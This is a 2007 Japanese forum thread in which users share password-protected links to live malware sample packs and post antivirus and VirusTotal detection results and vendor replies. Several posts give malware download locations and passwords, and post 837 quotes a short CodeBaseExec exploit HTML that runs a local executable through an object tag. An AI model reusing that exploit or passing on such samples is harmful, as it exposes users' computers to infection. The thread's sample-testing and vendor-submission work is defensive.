07/09/13 18:24:30
URLリンク(www.dotup.org)
virus
山田とか騒がれてるが
822:名無しさん@お腹いっぱい。
07/09/13 18:48:10
ただのjpgとgif詰め合わせの自己解凍書庫
823:名無しさん@お腹いっぱい。
07/09/13 19:04:55
>>821
自分で解凍もできんのか?
見りゃウイルスじゃないことぐらい分かるだろが
824:名無しさん@お腹いっぱい。
07/09/15 18:25:04
検体:>>746
カスペ7
4.exeについて一週間ぶりに返事キタ━━━(゜∀゜)━━━ !!。
でも、遅い。糞詰まりでも起こしているのか?ヽ(`Д´)ノウワァァン!!
-----------------------------------------------------------
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Saturday, September 15, 2007 1:26 PM
Subject: RE: Please Inspect This File. A New Malware? [KLAB-2871286]
Hello,
4.exe - Trojan-Spy.Ruby.Kakkeys.u
New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
Please quote all when answering.
---------------------------------------------------------
結論
5/14→12/14(うち2は白,。1.exeとa.exe)
2.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.c
3.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.c
4.exe Trojan-Spy.Ruby.Kakkeys.u
5.exe Trojan-Spy.Ruby.Kakkeys
6.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.t
7.exe : Trojan program Trojan.Win32.VB.aqk
8.exe : Trojan program Trojan.Win32.Delf.zu
9.exe : Trojan program Trojan.Win32.Delf.zu
b.exe Trojan.Win32.Shutdowner.bm
c.exe: Trojan program Trojan.Win32.Haradong.ar
d.exe: Trojan program Trojan.Win32.KillFiles.ki
e.exe: Trojan program Trojan.Win32.KillFiles.ki
825:名無しさん@お腹いっぱい。
07/09/15 23:03:01
カスペ厨必死だなw
826:名無しさん@お腹いっぱい。
07/09/15 23:04:26
出張すんな
827:名無しさん@お腹いっぱい。
07/09/15 23:23:33
カスペは評判だけが先行して、
実は売れてないとか?
828:名無しさん@お腹いっぱい。
07/09/16 00:24:21
>>827
Amazonランキング見てみな
829:名無しさん@お腹いっぱい。
07/09/16 01:14:14
>>827
なんか中国でシェアNo1になるかもしれん勢いなんだとさ
知ったこっちゃねーがw
元々ゴミみたいなアンチウイルスがシェア上位を牛耳ってただけだしなw
830:名無しさん@お腹いっぱい。
07/09/16 09:27:55
またNOD厨か
831:名無しさん@お腹いっぱい。
07/09/16 09:53:51
>>829
中国のソフトウェア市場は9割が海賊版
832:名無しさん@お腹いっぱい。
07/09/16 12:26:31
URLリンク(www5.uploader.jp)
pass : folder
中身は .folderファイル
833:名無しさん@お腹いっぱい。
07/09/16 12:59:55
>>832
カス7
Exploit.HTML.CodeBaseExec
834:名無しさん@お腹いっぱい。
07/09/16 17:57:49
カス厨自演乙
835:名無しさん@お腹いっぱい。
07/09/16 18:38:12
>>832
McAfeeスルーヽ(`Д´)ノ
836:名無しさん@お腹いっぱい。
07/09/16 18:46:37
>>835
___
/ ヽ
, -‐ (_).⌒ l ̄| ⌒ | プギャーーー
l_j_j_j と) ノ─| ノ
/ / ヽ
〈 ノ |
837:名無しさん@お腹いっぱい。
07/09/16 18:52:58
>>832
これの中身って
<html><head><title></title>
<object CLASSID='CLSID:4455A55A-5FF7-42A0-94C4-CEAD0F76F6F5' CODEBASE='img001.txt.exe'></object>
<script>window.location = "./";</script></head><body></body></html>
ってゆうhtmlみたいなんだけど、これってどんな実害あるの?
838:名無しさん@お腹いっぱい。
07/09/16 19:01:04
>>832
F-Secure2008
Exploit.HTML.CodeBaseExec
839:837
07/09/16 19:02:38
>>832
アンカーミスった。。。
つまりローカルだと「img001.txt.exe」ってゆうウィルス実体?ファイルが存在しないのに、
このhtmlをトロイダウンローダーとかって判定するのってなんかむちゃくちゃな気が。。。
潜在的に危険なhtmlってこと?おれなんか大きな勘違いしてる?
840:名無しさん@お腹いっぱい。
07/09/16 19:24:33
>>832
URLリンク(www.virustotal.com)
File virus.folder received on 09.16.2007 12:16:29 (CET)
Result: 5/32 (15.63%)
ClamAV 0.91.2 2007.09.16 Trojan.Downloader.HTML.Codebase-1
Fortinet 3.11.0.0 2007.09.16 HTML/CodeBaseExec.A!exploit
F-Secure 6.70.13030.0 2007.09.15 Exploit.HTML.CodeBaseExec
Ikarus T3.1.1.12 2007.09.16 Exploit.HTML.CodeBaseExec
Kaspersky 4.0.2.24 2007.09.16 Exploit.HTML.CodeBaseExec
File size: 192 bytes
MD5: 3f66c020cda211770342071272571f1b
SHA1: de341e53a7ba3cf1e4e961aa77b63e63be12f470
841:名無しさん@お腹いっぱい。
07/09/16 20:40:16
>>832
ノートン
\virus.folder This file is not malicious by itself. However, it may be used by a malicious program.
842:名無しさん@お腹いっぱい。
07/09/16 20:46:53
これじゃねえの?
URLリンク(www.trendmicro.co.jp)
843:名無しさん@お腹いっぱい。
07/09/16 21:06:24
783 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2007/09/16(日) 21:01:42
Norton2002とAntivirが同等の検出力とか言ってる人。
下のスレを一ヶ月以上チェックして詳細な報告レポートを作ってくれ。
Antivirスレで場違いなノートンの宣伝をするのなら、これくらいのことはしてもらいたい。
【気違い】検出可否報告スレ3【禁止】
スレリンク(sec板)
844:名無しさん@お腹いっぱい。
07/09/16 21:10:23
一部のマルウェアの検出可否だけで判断するのは危険
AV ComparativesやVirus Bulletinのレポートを読む方が正確
845:名無しさん@お腹いっぱい。
07/09/16 21:19:20
つーことは二流三流のマルウェアにはノートン役立たずってことか
ストライクゾーン狭いんだな
846:名無しさん@お腹いっぱい。
07/09/16 21:23:06
>>845
ワールドワイドで確認されてるマルウェアが対象なんだから
ストライクゾーンは広すぎるくらい
馬鹿かお前はw
847:名無しさん@お腹いっぱい。
07/09/16 21:31:23
ということは
ワールドワイドの土俵の外はからっきし確定じゃん
井の中の蛙ストライクゾーンなんだね
848:名無しさん@お腹いっぱい。
07/09/16 21:51:30
確かにそうだな
少なくとも俺のワールドワイドは一般のワールドワイド+このスレだしな
849:名無しさん@お腹いっぱい。
07/09/16 22:18:23
某ワールドワイド君のワールドワイドは向こう三軒両隣程度という見解でよさそうだw
850:名無しさん@お腹いっぱい。
07/09/16 22:28:42
井の中の蛙ってw
Winnyにしか興味のない奴こそ
井の中の蛙、大海を知らずというべきだろw
851:↑ブツのネタ元知ってるみたいだYO www
07/09/16 22:37:09
そうなんだ知らなかったよ いやぁ 失敬失敬
852:名無しさん@お腹いっぱい。
07/09/16 22:43:39
問うに落ちず語るに落ちるw
853:名無しさん@お腹いっぱい。
07/09/16 22:45:32
AV ComparativesやVirus Bulletin引き合いに出したあげくが
ただの乞食かよw
854:名無しさん@お腹いっぱい。
07/09/16 22:46:30
なんかいつの間にかすごい勢いでwinny君は李下で冠を正してますな
855:名無しさん@お腹いっぱい。
07/09/16 23:47:10
>>852-854
なんか乞食が顔真っ赤にしてるな
856:↑
07/09/16 23:56:06
AV ComparativesやVirus Bulletinが大好きな乞食
857:↑もしかして長考1時間
07/09/16 23:57:19
.
858:名無しさん@お腹いっぱい。
07/09/16 23:59:03
>>856
おい 先に矢印使うなよ(^^;
859:↑
07/09/16 23:59:05
AV ComparativesやVirus Bulletinが大好きな乞食
860:859
07/09/17 00:03:56
>>858
レスタイミング悪すぎたな グダグダやw
861:名無しさん@お腹いっぱい。
07/09/17 00:04:14
(^^;オレ流れ弾に撃たれてる気がするw
862:名無しさん@お腹いっぱい。
07/09/17 00:18:22
AV ComparativesやVirus Bulletinが大好きな乞食のせいだな。
863:名無しさん@お腹いっぱい。
07/09/17 00:42:24
>>832
VB2007
スルー。検体送信済み
864:名無しさん@お腹いっぱい。
07/09/17 01:02:10
>>832
Antivirスルー(;´Д`)
865:名無しさん@お腹いっぱい。
07/09/17 06:10:43
>832
乙です!!
NOD32未検出。
提出しておきました。
866:名無しさん@お腹いっぱい。
07/09/17 21:16:50
>>832
AntiVir検出
Exp/HTML.CodeBaseExec.61
867:名無しさん@お腹いっぱい。
07/09/18 19:10:39
URLリンク(www5.uploader.jp)
Pass: Malware-Pack
いろいろ詰め合わせ
McAfeeには提出済み
868:名無しさん@お腹いっぱい。
07/09/18 19:23:52
>>867
乙です
Norton Internet Security 2008
2体検出/12ファイル
1.vbs : W32.SillyFDC
ad.htm : Downloader
残りは贈っておきます
869:名無しさん@お腹いっぱい。
07/09/18 19:41:04
>>867
ウイルスキラー
4\qq.htm
Trojan.DL.Script.JS.Agent.aa
5\ad.htm
Trojan.DL.Script.JS.Agent.lhf
9\cthaninkey.CAB>>MSINET.OCX
Trojan.PSW.Win32.LMir.yff
b\prviacy
Trojan.DL.Script.JS.Agent.af
870:名無しさん@お腹いっぱい。
07/09/18 19:53:39
チンカスペ
0\index.htm : JS.Agent.nv
4\qq.htm : HTML.Small.h
5\ad.htm : JS.Psyme.kf
残りは送る気毛頭ありません
871:名無しさん@お腹いっぱい。
07/09/18 22:35:27
>>867
ウイルスバスター2007
qq.htm JS_DLOADER.TTZ
他スルーなので検体提出
872:名無しさん@お腹いっぱい。
07/09/18 23:23:28
>>867
AVG
0\INDEX.HTM
Virus found JS/Downloader.Agent
6\INDEX.HTM
Virus found JS/Downloader.Agent
7\WMV.HTM
Virus found JS/Downloader.Agent
8\JB.EXE
Trojan horse Generic3.TJI
C\1.VBS
Virus found VBS/Nadix
残りはスルーしたので検体送りました
873:名無しさん@お腹いっぱい。
07/09/19 01:31:31
>>867
カスペ7
detected: Trojan program Trojan-Downloader.JS.Agent.nv File: tane_uljp00133.zip/Malware/0/index.htm
detected: Trojan program Trojan-Downloader.HTML.Small.h File: tane_uljp00133.zip/Malware/4/qq.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.kf File: tane_uljp00133.zip/Malware/5/ad.htm
detected: Trojan program Trojan-Downloader.VBS.Agent.dz File: tane_uljp00133.zip/Malware/b/prviacy
detected: Trojan program Trojan-Downloader.VBS.Psyme.it File: tane_uljp00133.zip/Malware/c/1.vbs
これから検体提出
874:名無しさん@お腹いっぱい。
07/09/19 02:07:28
>>867
Avira AntiVir PersonalEdition Classic
VDF version internet: 6.39.1.147
--> Malware/4/qq.htm
[DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Nomo.1
--> Malware/5/ad.htm
[DETECTION] Contains suspicious code HEUR/Exploit.HTML
--> Malware/6/index.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/ADODB.Exploit.Gen
--> Malware/b/prviacy
[DETECTION] Contains detection pattern of the VBS script virus VBS/Dldr.Agent.AA
う~ん
875:名無しさん@お腹いっぱい。
07/09/19 08:38:51
>>867
AVG IS
0 Virus found JS/Downloader.Agent
6 Virus found JS/Downloader.Agent
7 Virus found JS/Downloader.Agent
8 Trojan horse Generic3.TJI
b Not-A-Virus.Exploit.HTML.Mht
c Virus found VBS/Nadix
876:869
07/09/19 11:43:45
9\cthaninkey.CAB>>MSINET.OCX
誤検出でした
877:873
07/09/19 12:11:00
>>867
カスペ7
0と7は追加検出。カスペ判断ではゴミ多い。
detected: Trojan program Trojan-Downloader.JS.Agent.nv File: tane_uljp00133.zip/Malware/0/index.htm
detected: Trojan program Trojan-Downloader.HTML.Small.h File: tane_uljp00133.zip/Malware/4/qq.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.kf File: tane_uljp00133.zip/Malware/5/ad.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.no File: tane_uljp00133.zip/Malware/6/index.htm
detected: Trojan program Trojan-Downloader.JS.Agent.qj File: tane_uljp00133.zip/Malware/7/wmv.htm
detected: Trojan program Trojan-Downloader.VBS.Agent.dz File: tane_uljp00133.zip/Malware/b/prviacy
detected: Trojan program Trojan-Downloader.VBS.Psyme.it File: tane_uljp00133.zip/Malware/c/1.vbs
以下のファイルは、
No malicious software was found in the attached file.
1 ceshi,exe
2 errclean.exe
3 Setup.,exe
8.Jb.exe
9. cthaninkey.cab
a adnuke35.exe
878:名無しさん@お腹いっぱい。
07/09/19 13:15:11
カスペ
879:名無しさん@お腹いっぱい。
07/09/19 19:45:08
Stoned.Angelina
URLリンク(sunbeltblog.blogspot.com)
880:名無しさん@お腹いっぱい。
07/09/19 19:57:18
現代のウイルス対策ソフト、過去のウイルスに対処できず
URLリンク(www.itmedia.co.jp)
正常に検出および削除ができたソフト
G Data (AVK) Total Care 2008
BitDefender Internet Security 2008 (v10)
Kaspersky Internet Security 7.0
検出できたが削除はできなかったソフト
BullGuard Internet Security 7.0
McAfee Internet Security 2007
Trend Micro PC-cillin Internet Security 2007
(ウイルスバスター 2007)
Avira AntiVir Personal Premium (v7)
検出および削除はできたが、その後 OS が起動できなくなってしまったソフト
Symantec Norton 360
Panda Internet Security 2008 (v12)
検出できなかったソフト
Microsoft OneCare 1.6
881:名無しさん@お腹いっぱい。
07/09/20 00:57:32
Microsoft OneCareの存在意義を問いただしたい
882:名無しさん@お腹いっぱい。
07/09/20 01:58:41
URLリンク(www5.uploader.jp)
pass: msn
Messenger経由系(Live?)
ロンドン在住の友人よりこんにちわ
883:名無しさん@お腹いっぱい。
07/09/20 02:19:43
>>882
URLリンク(www.virustotal.com)
File IMG09-18.jpeg-www.photoupload.com received on 09.19.2007 19:00:49 (CET)
Result: 11/32 (34.38%)
AntiVir 7.6.0.15 2007.09.19 Worm/LamerDetect.A
AVG 7.5.0.485 2007.09.19 Obfustat.PIZ
BitDefender 7.2 2007.09.19 Trojan.Agent.AFGC
CAT-QuickHeal 9.00 2007.09.19 I-Worm.LamerDetect.a
F-Secure 6.70.13030.0 2007.09.19 P2P-Worm.Win32.LamerDetect.a
Ikarus T3.1.1.12 2007.09.19 Trojan-PWS.Win32.LdPinch.FI
Kaspersky 4.0.2.24 2007.09.19 P2P-Worm.Win32.LamerDetect.a
Prevx1 V2 2007.09.19 Worm.Ircbot.Gen
Sunbelt 2.2.907.0 2007.09.19 VIPRE.Suspicious
TheHacker 6.2.5.062 2007.09.19 W32/LamerDetect.a
Webwasher-Gateway 6.0.1 2007.09.19 Worm.LamerDetect.A
File size: 29429 bytes
MD5: 8aefba0f7dc85ef4ac95378388fae724
SHA1: 8b0475b1284a3d0bf385c8e6126083fafc0d4017
packers: PECRYPT
Prevx info: URLリンク(fileinfo.prevx.com)
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
884:名無しさん@お腹いっぱい。
07/09/20 03:18:55
>>882
ウイルスバスター 2007(CPR)スルー
検体提出しました
885:名無しさん@お腹いっぱい。
07/09/20 07:53:13
NOD32だめだな。
886:名無しさん@お腹いっぱい。
07/09/20 08:11:04
>882
オツカレさま!!!
avast!検出せず・・・
提出しました。
887:名無しさん@お腹いっぱい。
07/09/20 09:16:36
>>882
AVG IS
Virus identified Obfustat.PIZ 検出
888:名無しさん@お腹いっぱい。
07/09/20 09:49:43
>>882
McAfeeスルーヽ(`Д´)ノ
889:名無しさん@お腹いっぱい。
07/09/20 14:55:37
>>882
bitdefender一個検出
890:名無しさん@お腹いっぱい。
07/09/20 16:48:38
>>882
乙です
Norton Internet Security 2008 反応無し
Symantecへ贈っておきました
891:名無しさん@お腹いっぱい。
07/09/20 20:47:46
>>882
ノートン対応
\IMG09-18.jpeg-www.photoupload.com
コンピュータ:
結果: このファイルの検出結果 W32.Spybot.Worm. URLリンク(www.symantec.com)
892:名無しさん@お腹いっぱい。
07/09/20 21:27:47
Kazaa板キンタマってとこか
BOT機能あるからP2P以外でも利用する意味があるわけね。
893:名無しさん@お腹いっぱい。
07/09/22 13:58:03
URLリンク(www5.uploader.jp)
Pass: Malware-Pack3
いろいろ詰め合わせ
McAfeeには提出済み
894:名無しさん@お腹いっぱい。
07/09/22 14:18:59
>>393
2\JsT.js : JS_AGENT.UHI
6\sina.htm : TROJ_Generic
9\sys614.htm : JS_DLOADER.PUX
b\soft.exe : TROJ_DLOADER.QDI
残りは送付済み
895:894
07/09/22 14:19:46
>>894
はウイルスバスター2007です。
896:名無しさん@お腹いっぱい。
07/09/22 15:15:36
あらら、virustotalからSymantecが無くなってるる。。。
>>893
ノートン反応
\b\soft.exe は Downloader ウィルスに感染しています。
無反応分、シマンテックに検体送付しました。
897:名無しさん@お腹いっぱい。
07/09/22 17:28:04
カスペ7
0 Trojan-Downloader.VBS.Agent.eg
1 Trojan-Downloader.VBS.Agent.ef
2 Trojan-Downloader.VBS.Agent.ee
4 Trojan-Downloader.VBS.Agent.eh
5 Trojan-Downloader.VBS.Agent.ed
6 Trojan-Downloader.VBS.Agent.ec
7 Trojan-Downloader.JS.Agent.rd
8 Trojan-Downloader.JS.Agent.nv
8 Trojan-Downloader.JS.Psyme.nv
c Trojan-Downloader.JS.Agent.rc
898:名無しさん@お腹いっぱい。
07/09/22 18:32:03
>>893
897を訂正すると、
×8 Trojan-Downloader.JS.Psyme.nv
○9 Trojan-Downloader.JS.Psyme.nv
の誤り
b detected: virus Heur.Trojan.Generic (modification) File: tane_uljp00135.zip/malware/b/soft.exe(ヒューリスティック検知)
未検知分は、検体提出。
899:名無しさん@お腹いっぱい。
07/09/22 20:45:54
>>893
まいど乙
AVIRA Antivir PEC
検出分
0\index.htm: HEUR/Exploit.HTML
1.htm: HEUR/Exploit.HTML
4\flash.js: HEUR/Exploit.HTML
5\index.htm: HEUR/Exploit.HTML
6\sina.htm: HTML/Dldr.Sina
9\sys614.htm: EXP/WMPload.A
b\soft.exe: TR/Dldr.Versie.1
未検出分送致スミ
900:名無しさん@お腹いっぱい。
07/09/22 21:02:38
>>893
ウイルスキラー
1\1.htm
Trojan.DL.VBS.Small.ez
5\index.htm
Trojan.DL.VBS.Agent.xhd
6\sina.htm
Trojan.DL.VBS.Agent.xfq
901:898
07/09/22 22:22:29
3について、白の返事
Hello,
s_14_0
No malicious code was found in this file.
Please quote all when answering.
bについてシグネチャに変更
Trojan program Trojan-Downloader.Win32.Delf.cex
902:名無しさん@お腹いっぱい。
07/09/22 23:49:29
>>893
AVG IS
0 Downloader.Agent.m
4 Virus found JS/Downloader.Agent
5 Downloader.Agent.m
6 Downloader.Small.dk
8 Virus found JS/Downloader.Agent
b Trojan horse Generic7.QVB
c Virus found JS/Downloader.Agent
903:名無しさん@お腹いっぱい。
07/09/23 12:57:32
キング
malware\b\soft.exe
Win32.Troj.OnLineGames.sj.37888
904:名無しさん@お腹いっぱい。
07/09/23 14:02:20
KINGやるぅ~
905:名無しさん@お腹いっぱい。
07/09/23 14:16:28
>>898
>b detected: virus Heur.Trojan.Generic (modification) File: tane_uljp00135.zip/malware/b/soft.exe(ヒューリスティック検知)
カスペ7 ヒューリスティックちゃんと動作するんだな
積極的な効き味ではないみたいだけど・・・
堅実な方向に振っているな
906:名無しさん@お腹いっぱい。
07/09/23 14:29:31
カスペ厨必死だねw
907:名無しさん@お腹いっぱい。
07/09/23 14:35:08
s_14_0を獄窓につっこんでも?としか表示されない
ヘッダを見ると.exeらしいんだが どういうこと?
908:名無しさん@お腹いっぱい。
07/09/23 15:50:21
URLリンク(zero.bestmanage3.org)
pass:virus
909:名無しさん@お腹いっぱい。
07/09/23 16:07:27
>>908
踏んだらカスペが鳴きっぱなしだった
910:名無しさん@お腹いっぱい。
07/09/23 16:12:30
>>908
ノートン・ファイター大激怒
911:名無しさん@お腹いっぱい。
07/09/23 16:15:45
>>908
URLリンク(85.255.116.234)
ここに飛ばされるね
ちょっとびっくりした
URLリンク(so.7walker.net)
912:名無しさん@お腹いっぱい。
07/09/23 16:31:46
これかぁ
営業企画お尻に火がついた戦士ノートン・ファイター
URLリンク(news.google.com)
913:名無しさん@お腹いっぱい。
07/09/23 16:42:42
ノートン・ファイター
URLリンク(internet.watch.impress.co.jp)
914:名無しさん@お腹いっぱい。
07/09/23 16:52:08
>>908
inhoster.com
915:名無しさん@お腹いっぱい。
07/09/23 17:08:56
URLリンク(www.dotup.org)
virus
ノートン送付済み
916:名無しさん@お腹いっぱい。
07/09/23 17:12:48
inst.exe
おちんぽ!!!!!おちんぽ!!!!!!!!!!
うせろ。
917:名無しさん@お腹いっぱい。
07/09/23 17:16:11
>>915
バスタースルー
918:名無しさん@お腹いっぱい。
07/09/23 17:23:52
Microsoft 1.2803 2007.09.23 password protected
NOD32v2 2545 2007.09.23 the file is probably password protected.
パスワードなんて掛かってないのに・・・・2つだけおバカメッセージを出した以外は無反応かあ。
919:名無しさん@お腹いっぱい。
07/09/23 17:26:05
新種か
カスペに送っておきます
920:名無しさん@お腹いっぱい。
07/09/23 17:29:10
>>915
㌧。
カスペ7 スルー
VTでも反応しないみたいだがだが。
921:918
07/09/23 17:29:22
すまん、バカは俺だった。いってくる・・・・
922:名無しさん@お腹いっぱい。
07/09/23 18:29:45
>>893
Risingより
1.文件名:index.htm
病毒名:Trojan.DL.Script.JS.Agent.lht
2.文件名:JsT.js
病毒名:Trojan.DL.Script.JS.Agent.lhx
3.文件名:s_14_0
不是病毒
4.文件名:flash.js
病毒名:Trojan.DL.Script.JS.Agent.lhy
5.文件名:index.htm
病毒名:Trojan.DL.Script.JS.Agent.lhw
6.文件名:bodg.htm
病毒名:Trojan.DL.Script.JS.Agent.lhv
7.文件名:sys614.htm
病毒名:Trojan.DL.Script.JS.Agent.a
8.文件名:Pic368.gif
不是病毒
9.文件名:soft.exe
病毒名:Trojan.DL.Win32.Autorun.ytd
10.文件名:smss.htm
病毒名:Trojan.DL.Script.JS.Agent.lhu
>>915
キラースルー
923:名無しさん@お腹いっぱい。
07/09/23 18:40:56
>>915
AVGスルー
924:名無しさん@お腹いっぱい。
07/09/23 18:42:13
>>915
McAfeeもいつも通りスルー
925:名無しさん@お腹いっぱい。
07/09/23 18:42:29
>>915
カスペから反応来た
>No malicious code was found in this file.
>Please quote all when answering.
926:名無しさん@お腹いっぱい。
07/09/23 19:39:54
NOD32スルー
927:名無しさん@お腹いっぱい。
07/09/23 20:08:20
>>915
AntiVir スルー
928:名無しさん@お腹いっぱい。
07/09/23 20:12:27
>>908
ZoneAlarmPROアンチスパイウェアが、サイトに接続をブロック
929:名無しさん@お腹いっぱい。
07/09/23 20:24:32
>>908
キングじゃ怖くて踏めません
930:名無しさん@お腹いっぱい。
07/09/23 20:49:38
>>908
馬鹿野郎!zipだと安心してリカバリ完了後の穴だらけPCで
踏んじゃったジャマイカ!
931:930
07/09/23 20:51:31
案の定変なプロセス動いてますた('・ω・)
932:名無しさん@お腹いっぱい。
07/09/23 20:59:37
怒った後、急に静かに… カワイソスw
933:930
07/09/23 21:12:45
あやしいファイルひとまとめにして検体にします(・ω・)ノ
from 第二号機PC
934:930
07/09/23 22:20:22
駆除作業完了!って思った矢先これですか・・・('・ω・)
URLリンク(www.dotup.org)
935:930
07/09/23 22:26:19
ダウソパス sec
zipパス fuzakenji
URLリンク(www.dotup.org)
もうリカバリします('・ω・)
936:名無しさん@お腹いっぱい。
07/09/23 22:53:33
>>915
あほかっ!!!
ただのテキストファイルだろーが。
937:八頭
07/09/23 22:57:10
YouTube - Cheap Trick
URLリンク(www.youtube.com)
938:名無しさん@お腹いっぱい。
07/09/23 22:59:44
嗚呼、916が見えないw
939:名無しさん@お腹いっぱい。
07/09/23 23:01:16
>>915
>>936確認
釣られた。。。
>>916
見落としてたよ
940:名無しさん@お腹いっぱい。
07/09/24 12:55:06
>>935
[!] ファイルがありません
www.dotup.org2686.jpg----./uploda/www.dotup.org2686.jpg_/www.dot... ファイルが存在しません。
941:名無しさん@お腹いっぱい。
07/09/24 16:16:40
>>908
キングで反応あり
RISK.Exploit.Ani
942:名無しさん@お腹いっぱい。
07/09/24 18:48:14
Is the Wildlist still relevant?
URLリンク(www.sophos.com)
今更w
943:名無しさん@お腹いっぱい。
07/09/25 07:42:31
URLリンク(www.perfect-av.com)
本日の動画!!をクリックして反応有ればAVが正常だと思うんだけど
どう?
944:名無しさん@お腹いっぱい。
07/09/25 08:13:40
Avira AntiVir PersonalEdition Classic
--> PerfectAV.exe
[DETECTION] Is the Trojan horse TR/VB.awc.14
PerfectAV.exeがDLされてくるけど、途中で反応した
945:名無しさん@お腹いっぱい。
07/09/25 08:20:24
>>943
マカフィー
検出:PWS-Hachilem
946:名無しさん@お腹いっぱい。
07/09/25 08:42:30
>>943
キング反応なし
947:名無しさん@お腹いっぱい。
07/09/25 08:43:34
>>943
EsetSmartSecurityのβ版
反応なし
948:名無しさん@お腹いっぱい。
07/09/25 09:08:39
>>943
ウイルスキラー
Trojan.PSW.VB.ado
949:名無しさん@お腹いっぱい。
07/09/25 11:50:04
>>943
Norton Internet Security 2008
Trojan.Hachilem!gen として検出
950:名無しさん@お腹いっぱい。
07/09/25 12:09:16
>>943
ウイルスバスター2007
TSPY_VB.DTV
951:名無しさん@お腹いっぱい。
07/09/25 17:46:35
>>943
avast! 4.7 Home Edition
Win32:VB-ERE [Trj]
952:名無しさん@お腹いっぱい。
07/09/25 20:09:23
>>943
カスペ7 Web-AV
detected: Trojan program Trojan.Win32.VB.awc URL: URLリンク(www.perfect-av.com)
ちんぽは反応せず。
953:名無しさん@お腹いっぱい。
07/09/25 20:42:34
直リン貼るなボケ
954:名無しさん@お腹いっぱい。
07/09/25 21:52:24
>>943 PerfectAV.exe URLリンク(www.virustotal.com)
AhnLab-V3 2007.9.22.0 2007.09.24 Win-Trojan/Xema.variant
AntiVir 7.6.0.15 2007.09.25 TR/PSW.VB.KB.17
Authentium 4.93.8 2007.09.25 W32/PWStealer.KEN
Avast 4.7.1043.0 2007.09.24 Win32:Trojan-gen. {VB}
AVG 7.5.0.485 2007.09.25 PSW.Generic4.JOG
BitDefender 7.2 2007.09.25 Trojan.Pws.Vb.KB
ClamAV 0.91.2 2007.09.25 Trojan.Spy-7188
DrWeb 4.33 2007.09.25 BackDoor.Generic.1485
eSafe 7.0.15.0 2007.09.23 Win32.VB.kb
Ewido 4.0 2007.09.24 Trojan.VB.kb
Fortinet 3.11.0.0 2007.09.25 W32/VB.KB!tr.pws
F-Prot 4.3.2.48 2007.09.25 W32/PWStealer.KEN
F-Secure 6.70.13030.0 2007.09.25 Trojan-PSW.Win32.VB.kb
Ikarus T3.1.1.12 2007.09.25 Trojan.Win32.VB.awc
Kaspersky 4.0.2.24 2007.09.25 Trojan-PSW.Win32.VB.kb
McAfee 5126 2007.09.24 PWS-Hachilem
Microsoft 1.2803 2007.09.25 PWS:Win32/VB!2DD2
NOD32v2 2549 2007.09.25 probably a variant of Win32/PSW.VB.FS
Norman 5.80.02 2007.09.25 W32/VBTroj.GLS
Panda 9.0.0.4 2007.09.25 Suspicious file
Rising 19.42.11.00 2007.09.25 Trojan.PSW.VB.ado
Sophos 4.21.0 2007.09.25 Mal/Generic-A
Sunbelt 2.2.907.0 2007.09.25 Trojan.Hachilem!gen
Symantec 10 2007.09.25 Trojan.Hachilem!gen
TheHacker 6.2.5.068 2007.09.25 Trojan/PSW.VB.kb
VBA32 3.12.2.4 2007.09.25 Trojan-PSW.Win32.VB.kb
VirusBuster 4.3.26:9 2007.09.24 Trojan.PWS.VB.FBV
Webwasher-Gateway 6.0.1 2007.09.25 Trojan.PSW.VB.KB.17
File size: 360448 bytes MD5: d22d964eec6dcb52e77f9c41cec9b4e3 SHA1: 016df57660879197ae3532491f23313779b59bc0
Result: 28/32 (87.5%) スルー CAT-QuickHeal eTrust-Vet FileAdvisor Prevx1
>>946 キングに送っておいた。
955:名無しさん@お腹いっぱい。
07/09/25 23:36:03
>>943
NOD32なんだけど、ふつーにDLできちゃうしデスクトップ上の
「PerfectAV.exe」を選択して右クリックからスキャンしても無反応。。。なんで?
virustotal.comでは対応済になってるみたいだけど。
BitDefender v10でも同様に無反応。
AVGでは検出&削除できるからDLミスってこともない。
956:名無しさん@お腹いっぱい。
07/09/25 23:57:02
NODはよく知らないがヒューリスティックで検知してるみたいだから
ヒューリスティックの設定がわるいんじゃないか?
957:名無しさん@お腹いっぱい。
07/09/26 00:53:44
>>955
アップデートしてないんじゃない?
朝の時点ではBitDefenderとNODは対応してなかった
958:名無しさん@お腹いっぱい。
07/09/26 03:03:45
ワロタ
959:名無しさん@お腹いっぱい。
07/09/26 06:19:50
■■■■■■○○○○○○○○○○○○○○○
■○○○○■○■■■■■○○○■■■■■○
■○○○○■○■○○○■○○○○○○○■○
■○○○○■○■○○○■○○○○○○■○○
■○○○○■○■○○○■○○○○○○■○○
○○○○■○○■○○○■○○○○○■○○○
○○○○■○○■○○○■○○○○○■■○○
○○○■○○○■○○○■○○○○■○○■○
○○○■○○○■■■■■○○○■○○○○■
○○■○○○○■○○○■○○■○○○○○○
○○○○○○○○○○○○○○○○○○○○○
○○○○○○○○○○○○○○○○○○○○○
960:名無しさん@お腹いっぱい。
07/09/26 09:45:28
URLリンク(www5.uploader.jp)
pass: Malware-Pack4
いろいろ詰め合わせ
McAfeeには提出済み
961:名無しさん@お腹いっぱい。
07/09/26 10:41:03
>>960
Avira AntiVir V7.00.00.14
1.js
121.exe
gmsex.exe
spb40.exe
tool.js
上記未検出につき提出済み。
962:名無しさん@お腹いっぱい。
07/09/26 11:01:37
Avira 一応
--> malware\0\51-70.pif
[DETECTION] Contains detection pattern of the HEUR-DBLEXT/Crypted virus
--> malware\1\setup.exe
[DETECTION] Contains a detection pattern of the (dangerous) backdoor program BDS/Hupigon.dsx.243 Backdoor server programs
--> malware\3\mminstall.exe
[DETECTION] Is the Trojan horse TR/Spy.Banker.TW.116
--> malware\4\bf.htm
[DETECTION] Contains detection pattern of the Java script virus JS/Agent.EP
--> malware\5\ysydown.cab
[1] Archive type: CAB (Microsoft)
--> ysydown.exe
[DETECTION] Contains detection pattern of the dropper DR/Drop.Agent.amm.100
--> malware\6\player.exe
[DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
--> malware\7\vip.exe
[DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
963:名無しさん@お腹いっぱい。
07/09/26 11:05:08
>>960
